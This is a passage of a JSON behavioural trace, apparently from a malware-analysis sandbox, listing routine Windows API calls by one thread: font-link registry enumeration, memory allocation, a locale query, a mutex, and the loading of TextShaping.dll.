            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "61"
              },
              {
                "name": "ValueName",
                "value": "GulimChe"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\GulimChe"
              }
            ],
            "repeated": 0,
            "id": 284
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "62"
              },
              {
                "name": "ValueName",
                "value": "Gungsuh"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Gungsuh"
              }
            ],
            "repeated": 0,
            "id": 285
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "63"
              },
              {
                "name": "ValueName",
                "value": "GungsuhChe"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\GungsuhChe"
              }
            ],
            "repeated": 0,
            "id": 286
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "64"
              },
              {
                "name": "ValueName",
                "value": "Malgun Gothic"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Malgun Gothic"
              }
            ],
            "repeated": 0,
            "id": 287
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "65"
              },
              {
                "name": "ValueName",
                "value": "Malgun Gothic Bold"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Malgun Gothic Bold"
              }
            ],
            "repeated": 0,
            "id": 288
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "66"
              },
              {
                "name": "ValueName",
                "value": "Malgun Gothic Semilight"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Malgun Gothic Semilight"
              }
            ],
            "repeated": 0,
            "id": 289
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": false,
            "return": "0x00000103",
            "pretty_return": "NO_MORE_ITEMS",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "67"
              },
              {
                "name": "ValueName",
                "value": ""
              },
              {
                "name": "Type",
                "value": "0",
                "pretty_value": "REG_NONE"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\"
              }
            ],
            "repeated": 0,
            "id": 290
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              }
            ],
            "repeated": 0,
            "id": 291
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x008e4000"
              },
              {
                "name": "RegionSize",
                "value": "0x00007000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 292
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "system",
            "api": "GetUserDefaultLCID",
            "status": true,
            "return": "0x00000419",
            "arguments": [
              {
                "name": "SystemDefaultLangID",
                "value": "0x00000419"
              },
              {
                "name": "LanguageName",
                "value": "Russian"
              }
            ],
            "repeated": 0,
            "id": 293
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0"
              },
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0"
              }
            ],
            "repeated": 0,
            "id": 294
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "ValueName",
                "value": "Disable"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0\\Disable"
              }
            ],
            "repeated": 0,
            "id": 295
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "ValueName",
                "value": "DataFilePath"
              },
              {
                "name": "Data",
                "value": "C:\\Windows\\Fonts\\staticcache.dat"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0\\DataFilePath"
              }
            ],
            "repeated": 0,
            "id": 296
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              }
            ],
            "repeated": 0,
            "id": 297
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000009"
              },
              {
                "name": "DesiredAccess",
                "value": "0x80100080",
                "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\Fonts\\staticcache.dat"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "no"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 298
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x008eb000"
              },
              {
                "name": "RegionSize",
                "value": "0x00015000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 299
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x00900000"
              },
              {
                "name": "RegionSize",
                "value": "0x00009000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 300
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "ntdll.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee3470000"
              },
              {
                "name": "FunctionName",
                "value": "RtlDllShutdownInProgress"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee34d3410"
              }
            ],
            "repeated": 0,
            "id": 301
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "synchronization",
            "api": "NtCreateMutant",
            "status": true,
            "return": "0x40000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "MutexName",
                "value": "Local\\SM0:3308:304:WilStaging_02"
              },
              {
                "name": "InitialOwner",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 302
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "system",
            "api": "NtWaitForSingleObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Milliseconds",
                "value": "18446744073709551615"
              },
              {
                "name": "Status",
                "value": "Infinite"
              }
            ],
            "repeated": 0,
            "id": 303
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 304
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "system",
            "api": "NtWaitForSingleObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000258"
              },
              {
                "name": "Milliseconds",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 305
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 306
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "system",
            "api": "NtWaitForSingleObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000025c"
              },
              {
                "name": "Milliseconds",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 307
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 308
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "system",
            "api": "NtWaitForSingleObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000025c"
              },
              {
                "name": "Milliseconds",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 309
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000025c"
              }
            ],
            "repeated": 0,
            "id": 310
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000258"
              }
            ],
            "repeated": 0,
            "id": 311
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "synchronization",
            "api": "NtReleaseMutant",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              }
            ],
            "repeated": 0,
            "id": 312
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              }
            ],
            "repeated": 0,
            "id": 313
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "process",
            "api": "NtSetInformationProcess",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessInformationClass",
                "value": "93"
              },
              {
                "name": "ProcessInformation",
                "value": "\\x7f7\\x9e}"
              }
            ],
            "repeated": 0,
            "id": 314
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "process",
            "api": "NtOpenSection",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0000000d"
              },
              {
                "name": "ObjectAttributes",
                "value": "TextShaping.dll"
              }
            ],
            "repeated": 0,
            "id": 315
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "filesystem",
            "api": "NtQueryAttributesFile",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Temp\\TextShaping.dll"
              }
            ],
            "repeated": 0,
            "id": 316
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "filesystem",
            "api": "NtQueryAttributesFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\TextShaping.dll"
              }
            ],
            "repeated": 0,
            "id": 317
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000254"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100021",
                "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\TextShaping.dll"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 318
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "process",
            "api": "NtCreateSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000258"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0000000d",
                "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE"
              },
              {
                "name": "ObjectAttributes",
                "value": ""
              },
              {
                "name": "FileHandle",
                "value": "0x00000254"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\TextShaping.dll"
              }
            ],
            "repeated": 0,
            "id": 319
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000258"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed6980000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x000ac000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000080",
                "pretty_value": "PAGE_EXECUTE_WRITECOPY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 320
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed69cf000"
              },
              {
                "name": "ModuleName",
                "value": "TextShaping.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 321
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000258"
              }
            ],
            "repeated": 0,
            "id": 322
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              }
            ],
            "repeated": 0,
            "id": 323
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed69cf000"
              },
              {
                "name": "ModuleName",
                "value": "TextShaping.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 324
          },
          {
            "timestamp": "2025-11-20 10:58:26,094",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\TextShaping"
              },
              {
                "name": "DllBase",
                "value": "0x7ffed6980000"
              }
            ],
            "repeated": 0,
            "id": 325
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "system",
            "api": "LdrpCallInitRoutine",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "MappedPath",
                "value": "\\Device\\HarddiskVolume2\\Windows\\System32\\TextShaping"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed6980000"
              },
              {
                "name": "InitRoutine",
                "value": "0x7ffed69ca790"
              },
              {
                "name": "Reason",
                "value": "1"
              }
            ],
            "repeated": 0,
            "id": 326
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0ef5000"
              },
              {
                "name": "ModuleName",
                "value": "gdi32full.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 327
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0ef5000"
              },
              {
                "name": "ModuleName",
                "value": "gdi32full.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 328
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x00909000"
              },
              {
                "name": "RegionSize",
                "value": "0x00005000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 329
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x0090e000"
              },
              {
                "name": "RegionSize",
                "value": "0x00005000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 330
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback"
              },
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback"
              }
            ],
            "repeated": 0,
            "id": 331
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegQueryValueExA",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "ValueName",
                "value": "Plane1"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane1"
              }
            ],
            "repeated": 0,
            "id": 332
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegQueryValueExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "ValueName",
                "value": "Plane2"
              },
              {
                "name": "Data",
                "value": "SimSun-ExtB"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane2"
              }
            ],
            "repeated": 0,
            "id": 333
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegQueryValueExA",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "ValueName",
                "value": "Plane3"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane3"
              }
            ],
            "repeated": 0,
            "id": 334
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegQueryValueExA",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "ValueName",
                "value": "Plane4"
              },
              {
